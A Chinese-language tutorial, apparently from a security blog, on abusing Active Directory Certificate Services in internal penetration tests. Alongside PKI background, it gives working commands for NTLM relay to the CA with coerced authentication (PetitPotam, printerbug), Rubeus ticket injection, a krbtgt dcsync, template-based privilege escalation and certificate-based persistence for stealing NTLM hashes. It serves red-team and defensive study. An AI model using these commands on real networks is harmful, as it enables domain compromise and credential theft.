ADCS在内网渗透中的应用<\/h1>

文章前言<\/h2>

在攻防演练中遇到部署了证书服务(AD CS)的内网环境时，可以利用证书服务发布的部分证书进行多种内网攻击尝试：<\/p>

身份认证<\/strong>：在本地检索是否存在相关证书并用该证书进行域内身份认证<\/li>
权限维持<\/strong>：申请证书后即使后期用户更改密码，仍可使用证书获取NTLM Hash<\/li>
中继攻击<\/strong>：利用HTTP协议的CA证书申请界面进行NTLM Relay攻击<\/li>

配置滥用<\/strong>：利用配置错误实现权限提升<\/li> <\/ol>
企业PKI基础<\/h2>
PKI(公钥基础结构)是通过使用公钥技术和数字证书来确保系统信息安全的体系，微软的AD CS(Active Directory证书服务)是其PKI实现，可与AD DS服务结合用于：<\/p>

加密文件系统<\/li>
数字签名<\/li>
身份验证<\/li> <\/ul>
证书颁发机构(CA)<\/h3>
CA分为两类：<\/p>

企业CA<\/strong>：与AD DS服务结合，信息存储在AD DS数据库中，支持证书模板和自动注册证书<\/li>
独立CA<\/strong><\/li> <\/ol>
证书信任问题解决方案：<\/p>

手动导入CA证书(非域内计算机)<\/li>
使用组策略将企业根CA证书传播到域中所有用户和计算机的"受信任的根证书颁发机构"<\/li> <\/ul>
证书注册流程<\/h2>

客户端生成证书申请文件(可使用openssl或在线工具)<\/p>
openssl req -new -SHA256 -newkey rsa:4096 -nodes -keyout www.al1ex.com.key -out www.al1ex.com.csr -subj "\/C=CN\/ST=Beijing\/L=Beijing\/O=netstarsec\/OU=sec\/CN=www.al1ex.com"<\/span> <\/span><\/span><\/code><\/pre><\/li> 客户端发送证书申请文件给CA并选择证书模板<\/p> <\/li> CA验证模板是否存在、用户权限、证书用途等信息<\/p> <\/li> CA使用私钥签署证书<\/p> <\/li> <\/ol> 证书注册接口<\/h3> 证书注册网页<\/strong>：<\/p> 需安装"证书颁发机构Web"注册角色<\/li> 通过IIS服务器进行演示流程<\/li> <\/ul> <\/li> certmgr.msc\/certlm.msc<\/strong>：<\/p> 用于用户\/计算机证书的GUI申请方式<\/li> <\/ul> <\/li> Powershell<\/strong>：<\/p> 使用certreq.exe或Get-Certificate命令<\/li> <\/ul> <\/li> <\/ol> 内网攻防技术<\/h2> ADCS中继攻击<\/h3> 漏洞原理<\/h4> AD CS的HTTP协议证书注册接口易受NTLM中继攻击，原因：<\/p> 未启用NTLM中继保护<\/li> 使用NTLM而非更安全的Kerberos进行身份验证<\/li> <\/ul> 利用步骤<\/h4> 定位域内CA机器：<\/p> certutil -config - -ping <\/span><\/span><\/code><\/pre><\/li> 安装支持AD CS攻击的Impacket版本：<\/p> python3 -m pip install . <\/span><\/span><\/code><\/pre><\/li> 开启监听并设置目标CA：<\/p> python3 ntlmrelayx.py -t http:\/\/192.168.174.160\/certsrv\/certfnsh.asp -smb2support --adcs <\/span><\/span><\/code><\/pre><\/li> 强制认证方法：<\/p> printerbug<\/strong>： python3 printerbug.py hacke\/testuser:'test@123'<\/span>@dc.hacke.testlab 192.168.174.129 <\/span><\/span><\/code><\/pre><\/li> dementor.py<\/strong>： python3 dementor.py -d hacke.testlab -u Al1ex -p 'Kksvqm@123'<\/span> 192.168.174.129 192.168.174.2 <\/span><\/span><\/code><\/pre><\/li> Petitpotam.py<\/strong>： python3 PetitPotam.py -d hacke.testlab -u Al1ex -p 'Kksvqm@123'<\/span> 192.168.174.129 192.168.174.160 <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 获取TGT并注入：<\/p> Rubeus.exe asktgt \/user:DC$ \/certificate:base64-certificate \/ptt <\/span><\/span><\/code><\/pre><\/li> 导出hash：<\/p> KERBEROS::List <\/span><\/span>lsadump::dcsync \/user:krbtgt <\/span><\/span><\/code><\/pre><\/li> <\/ol> 防御措施<\/h4> 开启SSL认证<\/li> 开启NTML中继保护<\/li> <\/ul> ADCS权限提升<\/h3> 基本原理<\/h4> 证书模板中若包含以下策略之一则具备Kerberos认证能力：<\/p> 客户端认证(OID 1.3.6.1.5.5.7.3.2)<\/li> PKINIT客户端身份验证(1.3.6.1.5.2.3.4)<\/li> 智能卡登录(OID 1.3.6.1.4.1.311.20.2.2)<\/li> 任何目的(OID 2.5.29.37.0)<\/li> <\/ul> 利用条件<\/h4> 企业CA授予低级用户注册权限<\/li> CA证书无需授权签名<\/li> CA证书管理程序批准已禁用<\/li> 证书模板允许请求者在CSR中指定subjectAltName(SAN)<\/li> 证书模板定义了启用身份验证的EKU<\/li> <\/ol> 利用步骤<\/h4> 使用certmgr申请证书(以域管为例)<\/li> 查看并导出本地计算机证书： certutil -user -store My <\/span><\/span>certutil -user -exportPFX f7bf99c86db5107e540c75055b17c2ddacbccb1a ADM.pfx <\/span><\/span><\/code><\/pre><\/li> 使用Rubeus请求票证并PTT： Rubeus.exe asktgt \/user:administrator \/certificate:ADM.pfx \/password:123456 \/ptt <\/span><\/span><\/code><\/pre><\/li> 查看本地缓存票证： klist <\/span><\/span><\/code><\/pre><\/li> <\/ol> ADCS权限维持<\/h3> 基本原理<\/h4> 使用证书进行Kerberos认证时，返回票据的PAC包中包含NTLM票据，可用于获取用户NTLM Hash。即使重置密码，证书仍可作为独立身份验证材料使用。<\/p> 利用步骤<\/h4> 发现目标主机中的用户证书<\/li> 查看并导出可用证书： certutil -user -store My <\/span><\/span>certutil -user -exportPFX f418dede290437696deeb6f53f099f1b58c918fb c:\U<\/span>sers\A<\/span>l1ex.HACKE\D<\/span>esktop\A<\/span>l1ex.pfx <\/span><\/span><\/code><\/pre><\/li> 将pfx文件导入本地计算机<\/li> 使用Kekeo获取用户的NTLM： tgt::pac \/subject:Al1ex \/castore:current_user \/domain:hacke.testlab <\/span><\/span><\/code><\/pre><\/li> 即使用户修改密码后，仍可使用证书窃取NTLM Hash<\/li> <\/ol>